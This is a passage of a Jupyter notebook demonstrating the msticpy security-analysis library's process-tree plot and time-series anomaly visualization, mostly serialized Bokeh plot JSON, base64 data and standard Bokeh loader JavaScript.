PP+hHZCANDK9f6EdkIAcEDz/oR2QgDw0fX+hHZCAHBA8/6EdkIAMNn1/oR2QgBwQPP+hHZCABDg9f6EdkIAcEDz/oR2QgAQ7/X+hHZCAHBA8/6EdkIA0Pb1/oR2QgBwQPP+hHZCAFD/9f6EdkIAkAT2/oR2QgCQBPb+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAFAT9v6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAgDX2/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAABH9v6EdkIAcEDz/oR2QgCwSfb+hHZCAHBA8/6EdkIAAEz2/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAOBm9v6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAQH/2/oR2QgBwQPP+hHZCAHBA8/6EdkIA4IT2/oR2QgBwQPP+hHZCAHBA8/6EdkIA4In2/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAELH2/oR2QgBwQPP+hHZCAEC29v6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAAOz2/oR2QgAw8Pb+hHZCAHBA8/6EdkIA8Pj2/oR2QgDA+fb+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgBwQPP+hHZCAHBA8/6EdkIAcEDz/oR2QgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD8qfHSTWJAwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/Knx0k1iQMMAAAAAAAAAAACACR/9hHZCAIAJH/2EdkIAwHs1/YR2Qvyp8dJNYkDDAAAAAAAAAAAAcF/z/oR2QgBwX/P+hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[369]}},\"selected\":{\"id\":\"5183\"},\"selection_policy\":{\"id\":\"5182\"}},\"id\":\"5136\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"5158\",\"type\":\"SaveTool\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"5180\"},\"group\":null,\"major_label_policy\":{\"id\":\"5181\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"5210\"},\"visible\":false},\"id\":\"5149\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"5267\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"5173\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@NewProcessId\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TgtLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T.%3N}\"]]},\"id\":\"5166\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"5268\",\"type\":\"AllLabels\"},{\"attributes\":{\"factors\":[\"MSTICAdmin\",\"MSTICAlertsWin1$\"],\"palette\":[\"#440154\",\"#208F8C\",\"#FDE724\"]},\"id\":\"5137\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{},\"id\":\"5157\",\"type\":\"ResetTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"ProcessTree\"},\"id\":\"5139\",\"type\":\"Title\"},{\"attributes\":{\"range\":{\"id\":\"5141\"},\"value\":1.75},\"id\":\"5168\",\"type\":\"Dodge\"},{\"attributes\":{\"active_scroll\":{\"id\":\"5160\"},\"tools\":[{\"id\":\"5157\"},{\"id\":\"5158\"},{\"id\":\"5159\"},{\"id\":\"5160\"},{\"id\":\"5166\"}]},\"id\":\"5161\",\"type\":\"Toolbar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"5137\"}},\"height\":{\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5168\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"5170\",\"type\":\"Rect\"},{\"attributes\":{\"dimension\":\"height\"},\"id\":\"5160\",\"type\":\"WheelPanTool\"},{\"attributes\":{\"axis\":{\"id\":\"5153\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":\"navy\",\"group\":null,\"ticker\":null,\"visible\":false},\"id\":\"5156\",\"type\":\"Grid\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5186\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5187\"}}},\"id\":\"5190\",\"type\":\"Text\"},{\"attributes\":{\"label\":{\"field\":\"SubjectUserName\"},\"renderers\":[{\"id\":\"5173\"}]},\"id\":\"5185\",\"type\":\"LegendItem\"},{\"attributes\":{\"range\":{\"id\":\"5143\"},\"value\":-0.2},\"id\":\"5187\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":{\"id\":\"5141\"},\"value\":0.1},\"id\":\"5186\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"5154\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5149\"},\"coordinates\":null,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"group\":null,\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"5212\"}},\"id\":\"5152\",\"type\":\"Grid\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5186\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5187\"}}},\"id\":\"5189\",\"type\":\"Text\"}],\"root_ids\":[\"5257\"]},\"title\":\"Bokeh Application\",\"version\":\"2.4.2\"}};\n const render_items = [{\"docid\":\"7c0d3856-5269-41dc-aa9e-fbbb0a0de9ad\",\"root_ids\":[\"5257\"],\"roots\":{\"5257\":\"2e607bc9-83e7-4b0c-a6dd-6e5acfa286b5\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n let attempts = 0;\n const timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "5257" } }, "output_type": "display_data" }, { "data": { "text/plain": [ "(Figure(id='5138', ...), Row(id='5257', ...))" ] }, "execution_count": 98, "metadata": {}, "output_type": "execute_result" } ], "source": [ "proc_df.mp_plot.process_tree(legend_col=\"SubjectUserName\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Time Series improvements\n", "\n", "Previously - minimal code\n", "```python\n", "from msticpy.nbtools.timeseries import display_timeseries_anomolies \n", "from msticpy.analysis.timeseries import timeseries_anomalies_stl\n", "\n", "ts_data = pd.read_csv(\"data/TimeSeriesDemo.csv\", parse_dates=[\"TimeGenerated\"])\n", "ts_data = ts_data[[\"TimeGenerated\", \"TotalBytesSent\"]]\n", "ts_data = ts_data.set_index(\"TimeGenerated\")\n", "\n", "ts_df = timeseries_anomalies_stl(ts_data)\n", "display_timeseries_anomolies(ts_df)\n", "\n", "```" ] }, { "cell_type": "code", "execution_count": 100, "metadata": {}, "outputs": [ { "data": { "text/html": [ "\n", "
\n", " \n", " Loading BokehJS ...\n", "
" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n const force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n const JS_MIME_TYPE = 'application/javascript';\n const HTML_MIME_TYPE = 'text/html';\n const EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n const CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n const script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n const cell = handle.cell;\n\n const id = cell.output_area._bokeh_element_id;\n const server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n const cmd_clean = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd_clean, {\n iopub: {\n output: function(msg) {\n const id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n const cmd_destroy = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd_destroy);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n const output_area = handle.output_area;\n const output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n const toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n const bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n const script_attrs = bk_div.children[0].attributes;\n for (let i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n const toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n const props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n const events = require('base/js/events');\n const OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n const NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n const el = document.getElementById(\"5366\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n const js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-mathjax-2.4.2.min.js\"];\n const css_urls = [];\n \n\n const inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (let i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n const cell = $(document.getElementById(\"5366\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n const docs_json = {\"f778c214-9c95-4c26-bea6-7f6cc4b14ae8\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"5369\"},{\"id\":\"5490\"}]},\"id\":\"5521\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"5374\",\"type\":\"DataRange1d\"},{\"attributes\":{\"axis\":{\"id\":\"5380\"},\"coordinates\":null,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"5383\",\"type\":\"Grid\"},{\"attributes\":{\"axis_label\":\"TotalBytesSent\",\"coordinates\":null,\"formatter\":{\"id\":\"5403\"},\"group\":null,\"major_label_policy\":{\"id\":\"5413\"},\"ticker\":{\"id\":\"5385\"}},\"id\":\"5384\",\"type\":\"LinearAxis\"},{\"attributes\":{\"overlay\":{\"id\":\"5393\"}},\"id\":\"5389\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"5419\"},{\"id\":\"5420\"},{\"id\":\"5421\"},{\"id\":\"5422\"},{\"id\":\"5423\"},{\"id\":\"5424\"},{\"id\":\"5425\"},{\"id\":\"5426\"},{\"id\":\"5427\"},{\"id\":\"5428\"},{\"id\":\"5429\"},{\"id\":\"5430\"}]},\"id\":\"5381\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"format\":\"00\"},\"id\":\"5403\",\"type\":\"NumeralTickFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"5384\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"5387\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"5529\",\"type\":\"AllLabels\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5388\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"5385\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"5391\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"5390\",\"type\":\"ResetTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5392\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"5413\",\"type\":\"AllLabels\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5401\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"5416\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5393\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"5417\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5376\",\"type\":\"LinearScale\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"Time Series Anomalies Visualization\"},\"id\":\"5370\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"#1f77b4\"},\"hatch_alpha\":{\"value\":0.2},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"5408\",\"type\":\"Circle\"},{\"attributes\":{\"label\":{\"value\":\"observed\"},\"renderers\":[{\"id\":\"5409\"}]},\"id\":\"5432\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"firebrick\"},\"hatch_alpha\":{\"value\":0.1},\"hatch_color\":{\"value\":\"firebrick\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"firebrick\"},\"marker\":{\"value\":\"circle_x\"},\"size\":{\"value\":12},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"5463\",\"type\":\"Scatter\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"green\",\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"baseline\"}},\"id\":\"5435\",\"type\":\"Line\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5367\"},\"glyph\":{\"id\":\"5434\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5436\"},\"nonselection_glyph\":{\"id\":\"5435\"},\"view\":{\"id\":\"5438\"}},\"id\":\"5437\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":1559861820000.0,\"start\":1556539380000.0},\"id\":\"5372\",\"type\":\"Range1d\"},{\"attributes\":{\"click_policy\":\"hide\",\"coordinates\":null,\"group\":null,\"items\":[{\"id\":\"5432\"},{\"id\":\"5459\"},{\"id\":\"5489\"}],\"location\":\"top_left\"},\"id\":\"5431\",\"type\":\"Legend\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"hatch_alpha\":{\"value\":0.1},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"5407\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"blue\"},\"hatch_alpha\":{\"value\":0.2},\"hatch_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"score\"}},\"id\":\"5513\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"firebrick\"},\"hatch_alpha\":{\"value\":0.2},\"hatch_color\":{\"value\":\"firebrick\"},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"firebrick\"},\"marker\":{\"value\":\"circle_x\"},\"size\":{\"value\":12},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"5464\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"5415\",\"type\":\"AllLabels\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5367\"},\"glyph\":{\"id\":\"5406\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5408\"},\"nonselection_glyph\":{\"id\":\"5407\"},\"view\":{\"id\":\"5410\"}},\"id\":\"5409\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5509\"},\"glyph\":{\"id\":\"5511\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5513\"},\"nonselection_glyph\":{\"id\":\"5512\"},\"view\":{\"id\":\"5515\"}},\"id\":\"5514\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"line_color\":\"green\",\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"baseline\"}},\"id\":\"5434\",\"type\":\"Line\"},{\"attributes\":{\"line_alpha\":0.2,\"line_color\":\"green\",\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"baseline\"}},\"id\":\"5436\",\"type\":\"Line\"},{\"attributes\":{\"source\":{\"id\":\"5509\"}},\"id\":\"5515\",\"type\":\"CDSView\"},{\"attributes\":{\"source\":{\"id\":\"5367\"}},\"id\":\"5438\",\"type\":\"CDSView\"},{\"attributes\":{\"overlay\":{\"id\":\"5517\"},\"x_range\":{\"id\":\"5372\"},\"y_range\":null},\"id\":\"5516\",\"type\":\"RangeTool\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"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